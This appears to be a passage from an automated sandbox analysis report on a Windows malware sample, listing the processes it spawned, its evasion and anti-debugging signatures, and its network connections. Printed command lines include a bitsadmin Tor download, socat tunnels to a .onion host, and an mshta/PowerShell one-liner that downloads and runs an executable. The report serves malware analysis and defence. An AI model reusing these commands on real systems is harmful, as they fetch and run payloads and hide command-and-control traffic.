Source: C:\Users\user\Desktop\bbtsvbq.exeProcess created: C:\Windows\System32\taskkill.exe 'C:\Windows\System32\taskkill.exe' /F /im chrome.exe
Source: C:\Users\user\Desktop\bbtsvbq.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c powershell -ep Unrestricted -f 'C:\Users\user~1\AppData\Local\Temp\3s7V1nHq.ps1' | find /v '' >> 'C:\Users\user~1\AppData\Local\Temp\user-PC.log'
Source: C:\Users\user\Desktop\bbtsvbq.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c powershell -ep Unrestricted -f 'C:\Users\user~1\AppData\Local\Temp\U5f96EAq.ps1' | find /v '' >> 'C:\Users\user~1\AppData\Local\Temp\user-PC.log'
Source: C:\Users\user\Desktop\bbtsvbq.exeProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep Unrestricted -f 'C:\ProgramData\C4CqRww6.ps1'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /v ''
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\7za.exe 'C:\ProgramData\7za.exe' x -o'C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ' -y 'C:\Users\user~1\AppData\Local\Temp\QKB6w.zip'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /b /c bitsadmin /transfer /download /priority HIGH 'https://torproject.urown.net/dist/torbrowser/7.0.8/tor-win32-0.3.1.7.zip' 'C:\Users\user~1\AppData\Local\Temp\8LtgeHPulp.zip'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\7za.exe 'C:\ProgramData\7za.exe' x -o'C:\ProgramData\VitBTKxRu' -y 'C:\Users\user~1\AppData\Local\Temp\8LtgeHPulp.zip'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\7za.exe 'C:\ProgramData\7za.exe' x -o'C:\ProgramData\VitBTKxRu' -y 'C:\Users\user~1\AppData\Local\Temp\sX7raTm2LP.zip'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bitsadmin.exe bitsadmin /transfer /download /priority HIGH 'https://torproject.urown.net/dist/torbrowser/7.0.8/tor-win32-0.3.1.7.zip' 'C:\Users\user~1\AppData\Local\Temp\8LtgeHPulp.zip'
Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\System32\mshta.exe mshta.exe vbscript:close(CreateObject('WScript.Shell').Run('tor.exe',0,False))
Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\System32\mshta.exe mshta.exe vbscript:close(CreateObject('WScript.Shell').Run('socat tcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:y6r2er4d6iyyrbzl.onion:80,socksport=9050',0,False))
Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\System32\mshta.exe mshta.exe vbscript:close(CreateObject('WScript.Shell').Run('socat tcp4-LISTEN:5588,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:y6r2er4d6iyyrbzl.onion:5588,socksport=9050',0,False))
Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\System32\mshta.exe mshta.exe vbscript:close(CreateObject('WScript.Shell').Run('powershell.exe ''$F=$env:Temp+'\\xeAcHBDS.exe';rm -Force $F;$cl=(New-Object Net.WebClient);$cl.DownloadFile('http://127.0.0.1:5555/0dTRgfA.asp?ts&ip='+$cl.Download'+'String('http://api.ipify.org/'),$F);& $F''',0,False))
Source: C:\Windows\System32\taskeng.exeProcess created: unknown unknown
Source: C:\Windows\System32\mshta.exeProcess created: C:\ProgramData\VitBTKxRu\Tor\tor.exe 'C:\ProgramData\VitBTKxRu\Tor\tor.exe'
Source: C:\Windows\System32\mshta.exeProcess created: C:\ProgramData\VitBTKxRu\OZEImhRAzl\socat.exe 'C:\ProgramData\VitBTKxRu\OZEImhRAzl\socat.exe' tcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:y6r2er4d6iyyrbzl.onion:80,socksport=9050
Source: C:\Windows\System32\mshta.exeProcess created: C:\ProgramData\VitBTKxRu\OZEImhRAzl\socat.exe 'C:\ProgramData\VitBTKxRu\OZEImhRAzl\socat.exe' tcp4-LISTEN:5588,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:y6r2er4d6iyyrbzl.onion:5588,socksport=9050
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' '$F=$env:Temp+'\\xeAcHBDS.exe';rm -Force $F;$cl=(New-Object Net.WebClient);$cl.DownloadFile('http://127.0.0.1:5555/0dTRgfA.asp?ts&ip='+$cl.DownloadString('http://api.ipify.org/'),$F);& $F'
Source: C:\ProgramData\VitBTKxRu\OZEImhRAzl\socat.exeProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep Unrestricted -f 'C:\Users\user~1\AppData\Local\Temp\3s7V1nHq.ps1'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /v ''
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\9kehql3e.cmdline'
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES8E7D.tmp' 'c:\Users\user\AppData\Local\Temp\CSC8E0E.tmp'
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Users\user\Desktop\bbtsvbq.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Contains functionality to communicate with device driversShow sources
Source: C:\ProgramData\7za.exeCode function: 6_2_0040BACB: DeviceIoControl,DeviceIoControl,DeviceIoControl,DeviceIoControl,6_2_0040BACB
Creates mutexesShow sources
Source: C:\Users\user\Desktop\bbtsvbq.exeMutant created: \Sessions\1\BaseNamedObjects\brtirxtTEexrxt
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\CLR_PerfMon_WrapMutex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Found potential string decryption / allocating functionsShow sources
Source: C:\ProgramData\7za.exeCode function: String function: 00407A18 appears 180 times
Source: C:\ProgramData\7za.exeCode function: String function: 0046B890 appears 624 times
PE file does not import any functionsShow sources
Source: 9kehql3e.dll.35.drStatic PE information: No import functions for PE file found
Reads the hosts fileShow sources
Source: C:\Users\user\Desktop\bbtsvbq.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
Sample file is different than original file name gathered from version infoShow sources
Source: bbtsvbq.exeBinary or memory string: OriginalFilenamewship6.dll.muij% vs bbtsvbq.exe
Source: bbtsvbq.exeBinary or memory string: OriginalFilenamewshom.ocx vs bbtsvbq.exe
Source: bbtsvbq.exeBinary or memory string: OriginalFilenamewshtcpip.dll.muij% vs bbtsvbq.exe
Source: bbtsvbq.exeBinary or memory string: System.OriginalFileName vs bbtsvbq.exe
Source: bbtsvbq.exeBinary or memory string: OriginalFilenameMSXML3R.dllX vs bbtsvbq.exe
Source: bbtsvbq.exeBinary or memory string: OriginalFilenameSETUPAPI.DLL.MUIj% vs bbtsvbq.exe
Source: bbtsvbq.exeBinary or memory string: OriginalFilenamescrrun.dllV vs bbtsvbq.exe
Source: bbtsvbq.exeBinary or memory string: originalfilename vs bbtsvbq.exe
Source: bbtsvbq.exeBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs bbtsvbq.exe
Source: bbtsvbq.exeBinary or memory string: OriginalFilenamemsado15.dllj% vs bbtsvbq.exe
Source: bbtsvbq.exeBinary or memory string: OriginalFilenameKernelbasej% vs bbtsvbq.exe
Searches for the Microsoft Outlook file pathShow sources
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Powershell connects to networkShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 104.20.73.28 443
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 212.51.156.17 443
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 89.45.235.21 443
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 192.30.253.112 443
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 192.30.253.121 443
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 174.129.241.106 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 93.184.221.200 443
Powershell drops PE fileShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\7za.exe

HIPS / PFW / Operating System Protection Evasion:

barindex
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: bbtsvbq.exe, taskeng.exeBinary or memory string: Progman
Source: bbtsvbq.exe, taskeng.exeBinary or memory string: Program Manager
Source: bbtsvbq.exe, taskeng.exeBinary or memory string: Shell_TrayWnd
Uses taskkill to terminate processesShow sources
Source: C:\Users\user\Desktop\bbtsvbq.exeProcess created: C:\Windows\System32\taskkill.exe 'C:\Windows\System32\taskkill.exe' /F /im iexplore.exe
Source: C:\Users\user\Desktop\bbtsvbq.exeProcess created: C:\Windows\System32\taskkill.exe 'C:\Windows\System32\taskkill.exe' /F /im firefox.exe
Source: C:\Users\user\Desktop\bbtsvbq.exeProcess created: C:\Windows\System32\taskkill.exe 'C:\Windows\System32\taskkill.exe' /F /im chrome.exe
Very long cmdline option found, this is very uncommon (may be encrypted or packed)Show sources
Source: unknownProcess created: C:\Windows\System32\mshta.exe mshta.exe vbscript:close(CreateObject('WScript.Shell').Run('powershell.exe ''$F=$env:Temp+'\\xeAcHBDS.exe';rm -Force $F;$cl=(New-Object Net.WebClient);$cl.DownloadFile('http://127.0.0.1:5555/0dTRgfA.asp?ts&ip='+$cl.Download'+'String('http://api.ipify.org/'),$F);& $F''',0,False))
Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\System32\mshta.exe mshta.exe vbscript:close(CreateObject('WScript.Shell').Run('powershell.exe ''$F=$env:Temp+'\\xeAcHBDS.exe';rm -Force $F;$cl=(New-Object Net.WebClient);$cl.DownloadFile('http://127.0.0.1:5555/0dTRgfA.asp?ts&ip='+$cl.Download'+'String('http://api.ipify.org/'),$F);& $F''',0,False))
Found C# or VB.Net code to silently install a certificate (surpess security dialog)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\9kehql3e.0.cs

Anti Debugging:

barindex
Contains functionality to register its own exception handlerShow sources
Source: C:\Users\user\Desktop\bbtsvbq.exeCode function: 1_2_013B1CBB SetUnhandledExceptionFilter,1_2_013B1CBB
Source: C:\Users\user\Desktop\bbtsvbq.exeCode function: 1_2_013B1B6D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_013B1B6D
Source: C:\Users\user\Desktop\bbtsvbq.exeCode function: 1_2_013B1A4A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_013B1A4A
Source: C:\Users\user\Desktop\bbtsvbq.exeCode function: 1_2_013B4743 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_013B4743
Source: C:\ProgramData\7za.exeCode function: 6_2_0046E6AA SetUnhandledExceptionFilter,6_2_0046E6AA
Source: C:\ProgramData\7za.exeCode function: 6_2_0046E6BC SetUnhandledExceptionFilter,6_2_0046E6BC
Creates guard pages, often used to prevent reverse engineering and debuggingShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory allocated: page read and write and page guard
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Users\user\Desktop\bbtsvbq.exeSystem information queried: KernelDebuggerInformation
Contains functionality to check if a debugger is running (IsDebuggerPresent)Show sources
Source: C:\Users\user\Desktop\bbtsvbq.exeCode function: 1_2_013B1B6D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_013B1B6D
Contains functionality to dynamically determine API callsShow sources
Source: C:\ProgramData\7za.exeCode function: 6_2_00471C24 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_00471C24
Contains functionality to read the PEBShow sources
Source: C:\Users\user\Desktop\bbtsvbq.exeCode function: 1_2_013B4D30 mov eax, dword ptr fs:[00000030h]1_2_013B4D30
Contains functionality which may be used to detect a debugger (GetProcessHeap)Show sources
Source: C:\Users\user\Desktop\bbtsvbq.exeCode function: 1_2_013B7B23 GetProcessHeap,1_2_013B7B23
Enables debug privilegesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\ProgramData\VitBTKxRu\OZEImhRAzl\socat.exeProcess token adjusted: Debug
Source: C:\ProgramData\VitBTKxRu\OZEImhRAzl\socat.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

Malware Analysis System Evasion:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\Desktop\bbtsvbq.exeCode function: 1_2_013B6ECA FindFirstFileExA,1_2_013B6ECA
Source: C:\ProgramData\7za.exeCode function: 6_2_0040B174 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,AreFileApisANSI,FindFirstFileA,6_2_0040B174
Source: C:\ProgramData\7za.exeCode function: 6_2_0040B6E9 __EH_prolog,FindFirstFileW,GetCurrentDirectoryW,6_2_0040B6E9
Contains functionality to query system informationShow sources
Source: C:\ProgramData\7za.exeCode function: 6_2_0040C5F4 GetSystemInfo,6_2_0040C5F4
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: cached-microdescs.new.13.drBinary or memory string: ntor-onion-key 3N4WrVMCiVfr4fi9YWJA59/qb8YGTKvg8zeFsIE7MDU=
Source: unverified-microdesc-consensus.tmp.13.dr, cached-microdesc-consensus.tmp.13.drBinary or memory string: m LSAkc0pvTGWqeMUm+vxtmYkwt7JvgTfHo62w9+0O/F8
Source: cached-microdescs.new.13.drBinary or memory string: ntor-onion-key 85TobZi987xjVa4vMcIk4U2MCo7WxesUm8fD0zOJpG0=
Source: tor.exe, cached-microdescs.new.13.drBinary or memory string: MIGJAoGBAMeJpSyO1qlPpDXtW27+ieynz3Z+qEmudMH9du0aYBrjqcbYPPt/xsFd
Source: cached-microdescs.new.13.drBinary or memory string: id ed25519 oBcWh18xyuWrMnRfRQEMUl6fxGEBpOQPVBqsQRTgWN0
Source: cached-microdescs.new.13.drBinary or memory string: id ed25519 vA9zbcE+2YhiQRkUAt5LvMCijbpUW4Op15qrMlKqy+s
Program exit pointsShow sources
Source: C:\Users\user\Desktop\bbtsvbq.exeAPI call chain: ExitProcess graph end nodegraph_1-8207
Source: C:\Users\user\Desktop\bbtsvbq.exeAPI call chain: ExitProcess graph end nodegraph_1-6729
Source: C:\ProgramData\7za.exeAPI call chain: ExitProcess graph end nodegraph_6-55276
Source: C:\ProgramData\7za.exeAPI call chain: ExitProcess graph end nodegraph_6-55277
Queries a list of all running processesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
Contains long sleeps (>= 3 min)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 500
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 500
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 500
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
Found dropped PE file which has not been started or loadedShow sources
Source: C:\ProgramData\7za.exeDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net20\es\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exeDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net40\it\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exeDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net40\fr\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exeDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net452\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exeDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net452\de\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exeDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net40\de\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exeDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net20\de\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exeDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net20\it\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exeDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net35\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exeDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net452\es\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exeDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net35\it\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exeDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net35\fr\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exeDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net20\fr\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exeDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net40\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9kehql3e.dll
Source: C:\ProgramData\7za.exeDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net452\it\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exeDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net35\es\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exeDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net452\fr\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exeDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net35\de\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exeDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net20\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll
Source: C:\ProgramData\7za.exeDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net40\es\Microsoft.Win32.TaskScheduler.resources.dll
Found large amount of non-executed APIsShow sources
Source: C:\ProgramData\7za.exeAPI coverage: 8.0 %
Source: C:\ProgramData\VitBTKxRu\OZEImhRAzl\socat.exeAPI coverage: 1.4 %
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Users\user\Desktop\bbtsvbq.exe TID: 3748Thread sleep time: -720000s >= -60s
Source: C:\Users\user\Desktop\bbtsvbq.exe TID: 3752Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3904Thread sleep time: -4611686018427385s >= -60s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3908Thread sleep time: -500s >= -60s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3908Thread sleep time: -12000s >= -60s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3988Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3908Thread sleep time: -500s >= -60s
Source: C:\Windows\System32\bitsadmin.exe TID: 3968Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\taskeng.exe TID: 4000Thread sleep time: -100s >= -60s
Source: C:\Windows\System32\taskeng.exe TID: 4020Thread sleep time: -120000s >= -60s
Source: C:\Windows\System32\mshta.exe TID: 4072Thread sleep time: -120000s >= -60s
Source: C:\Windows\System32\mshta.exe TID: 2272Thread sleep time: -120000s >= -60s
Source: C:\Windows\System32\mshta.exe TID: 2512Thread sleep time: -120000s >= -60s
Source: C:\Windows\System32\mshta.exe TID: 2560Thread sleep time: -120000s >= -60s
Source: C:\Windows\System32\taskkill.exe TID: 2580Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\taskkill.exe TID: 2376Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\taskkill.exe TID: 2476Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2388Thread sleep time: -922337203685477s >= -60s

Hooking and other Techniques for Hiding and Protection:

barindex
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Users\user\Desktop\bbtsvbq.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
